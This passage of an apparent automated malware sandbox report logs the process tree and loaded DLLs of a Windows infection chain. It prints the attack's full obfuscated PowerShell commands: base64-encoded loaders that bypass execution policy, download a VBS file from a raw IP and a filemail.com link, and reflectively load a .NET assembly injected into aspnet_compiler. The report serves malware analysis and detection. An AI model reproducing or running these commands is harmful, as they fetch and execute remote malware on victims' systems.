CAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dk54el2n\dk54el2n.cmdline"
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9C55.tmp" "c:\Users\user\AppData\Local\Temp\dk54el2n\CSC71BE0DF5A47E408EAC9C81C5574F338.TMP"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFtbycrJ2NoYXZpbGhhKTs0QW1wcmVzdW0nKydwdHUnKydvc28gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg0JysnQW1saW5mb3RvbScrJ2lhKTs0QW1uaXRpZHVsYXIgPSBzSVc8PEJBJysnU0U2NF9TVEFSVD4+c0lXOzRBbW9idm9sdmlkbyA9IHNJVycrJzw8QkFTRTYnKyc0X0VORD4+c0lXOzRBbWxvZ29ncmlmbyA9IDRBbXByJysnZXN1bXB0dW9zby5JbmRleE9mKDRBbW5pdGknKydkdWxhcicrJyk7NEFtdG9saGlkbyA9IDRBbXByZXN1bXB0dW9zby5JbmRleE9mKDRBbW8nKydidm9sdmlkbyk7NEFtbG9nb2dyaWZvIC1nZSAwIC1hbmQgNEFtdG9saGlkbyAtZ3QgNEFtbG9nb2dyaWZvOzRBbWxvZ29ncmlmbyArPSA0QW1uaXRpZHVsYXIuTGVuZycrJ3RoOzRBbXZpbmRpdGEgPSA0QW10b2xoaWRvIC0gNEFtbG9nb2dyaWZvOzRBbScrJ2ZpZ2EgPSA0QW1wcmVzdW1wdHVvc28uU3Vic3RyaW5nKDRBbWxvZ29ncmlmbywgNEFtdmluZGl0YSk7NEFtYW50aWdhbWVudGUgPSAtam9pbiAoNEFtZmlnYS5UbycrJ0NoYXJBcnJhJysneSgpIFMnKydFMiBGb3JFYWNoLU9iamUnKydjdCB7IDRBbV8gfSlbLTEuLi0oNEFtZmlnYS5MZW5ndGgpXTs0QW1tYScrJ3Jtb3InKydpemFyJysnID0gWycrJ1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyg0QW1hbnRpZ2FtZW50ZSk7NEFtZGVzZW1tYWRlaXJhciA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoNEFtbWFybW9yaXphcik7NEFtcG9lJysndGlmaWNhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QocycrJ0lXVkFJcycrJ0lXKTs0QW0nKydwb2V0aWZpY2FyLkludm9rZSg0QW1udWxsLCBAKHNJV3R4dC5WR0ZSRS8zNDMxLzkyLjMyMS41NDIuMjcxLy86cHR0aHNJVywgc0lXNEFtZGUnKydzdW5pZmljYXJzSVcsIHNJVzRBbWRlc3VuaWZpY2Fyc0lXLCBzSVc0QW1kZXN1bmlmaWNhcnNJVywgc0lXYXNwbmV0X2NvbXBpbGVyc0lXLCBzSVc0JysnQW1kZXN1bmlmaWNhcnNJVywgc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYScrJ3JzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXMXNJVyxzSScrJ1c0QW1kZXN1bmlmaWNhcnNJVykpOycpIC1jUkVQbEFjZSAoW2NoYVJdNTIrW2NoYVJdNjUrW2NoYVJdMTA5KSxbY2hhUl0zNiAtY1JFUGxBY2UgJ3NJVycsW2NoYVJdMzkgIC1jUkVQbEFjZShbY2hhUl04MytbY2hhUl02OStbY2hhUl01MCksW2NoYVJdMTI0KSB8ICYoICRFTnY6Q29tc3BFY1s0LDI0LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')"
        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dk54el2n\dk54el2n.cmdline"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS" Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9C55.tmp" "c:\Users\user\AppData\Local\Temp\dk54el2n\CSC71BE0DF5A47E408EAC9C81C5574F338.TMP"Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFtbycrJ2NoYXZpbGhhKTs0QW1wcmVzdW0nKydwdHUnKydvc28gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg0JysnQW1saW5mb3RvbScrJ2lhKTs0QW1uaXRpZHVsYXIgPSBzSVc8PEJBJysnU0U2NF9TVEFSVD4+c0lXOzRBbW9idm9sdmlkbyA9IHNJVycrJzw8QkFTRTYnKyc0X0VORD4+c0lXOzRBbWxvZ29ncmlmbyA9IDRBbXByJysnZXN1bXB0dW9zby5JbmRleE9mKDRBbW5pdGknKydkdWxhcicrJyk7NEFtdG9saGlkbyA9IDRBbXByZXN1bXB0dW9zby5JbmRleE9mKDRBbW8nKydidm9sdmlkbyk7NEFtbG9nb2dyaWZvIC1nZSAwIC1hbmQgNEFtdG9saGlkbyAtZ3QgNEFtbG9nb2dyaWZvOzRBbWxvZ29ncmlmbyArPSA0QW1uaXRpZHVsYXIuTGVuZycrJ3RoOzRBbXZpbmRpdGEgPSA0QW10b2xoaWRvIC0gNEFtbG9nb2dyaWZvOzRBbScrJ2ZpZ2EgPSA0QW1wcmVzdW1wdHVvc28uU3Vic3RyaW5nKDRBbWxvZ29ncmlmbywgNEFtdmluZGl0YSk7NEFtYW50aWdhbWVudGUgPSAtam9pbiAoNEFtZmlnYS5UbycrJ0NoYXJBcnJhJysneSgpIFMnKydFMiBGb3JFYWNoLU9iamUnKydjdCB7IDRBbV8gfSlbLTEuLi0oNEFtZmlnYS5MZW5ndGgpXTs0QW1tYScrJ3Jtb3InKydpemFyJysnID0gWycrJ1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyg0QW1hbnRpZ2FtZW50ZSk7NEFtZGVzZW1tYWRlaXJhciA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoNEFtbWFybW9yaXphcik7NEFtcG9lJysndGlmaWNhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QocycrJ0lXVkFJcycrJ0lXKTs0QW0nKydwb2V0aWZpY2FyLkludm9rZSg0QW1udWxsLCBAKHNJV3R4dC5WR0ZSRS8zNDMxLzkyLjMyMS41NDIuMjcxLy86cHR0aHNJVywgc0lXNEFtZGUnKydzdW5pZmljYXJzSVcsIHNJVzRBbWRlc3VuaWZpY2Fyc0lXLCBzSVc0QW1kZXN1bmlmaWNhcnNJVywgc0lXYXNwbmV0X2NvbXBpbGVyc0lXLCBzSVc0JysnQW1kZXN1bmlmaWNhcnNJVywgc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYScrJ3JzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXMXNJVyxzSScrJ1c0QW1kZXN1bmlmaWNhcnNJVykpOycpIC1jUkVQbEFjZSAoW2NoYVJdNTIrW2NoYVJdNjUrW2NoYVJdMTA5KSxbY2hhUl0zNiAtY1JFUGxBY2UgJ3NJVycsW2NoYVJdMzkgIC1jUkVQbEFjZShbY2hhUl04MytbY2hhUl02OStbY2hhUl01MCksW2NoYVJdMTI0KSB8ICYoICRFTnY6Q29tc3BFY1s0LDI0LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')"Jump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
